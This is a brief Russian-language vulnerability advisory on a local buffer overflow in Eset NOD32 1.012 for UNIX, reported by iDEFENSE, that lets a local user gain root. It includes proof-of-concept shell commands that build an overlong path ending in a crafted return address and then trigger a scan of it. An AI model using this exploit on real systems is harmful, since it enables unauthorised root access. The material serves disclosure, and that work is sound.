Переполнение буфера обнаружено в антивирусе
Eset NOD32 для UNIX систем. Локальный пользователь может получить root привилегии. 

iDEFENSE сообщил, что местный пользователь может создать имя пути длиннее 500 символов, которое вызовет переполнение буфера в NOD32 при попытке просмотреть этот путь. Уязвимость позволяет перезаписать EAX и ECX регистр, в результате чего становится возможным выполнение произвольного кода с привилегиями сканирующего процесса (root пользователь). Пример: 

$ perl eggnod.pl
$ mkdir -p /tmp/`perl -e ‘print «A» x 255’`/`perl -e ‘print «B» x 240 .
«\xfc\xbf\xbf»‘`
$ nod32 /tmp

Уязвимость обнаружена в NOD32 1.012.



Оставить мнение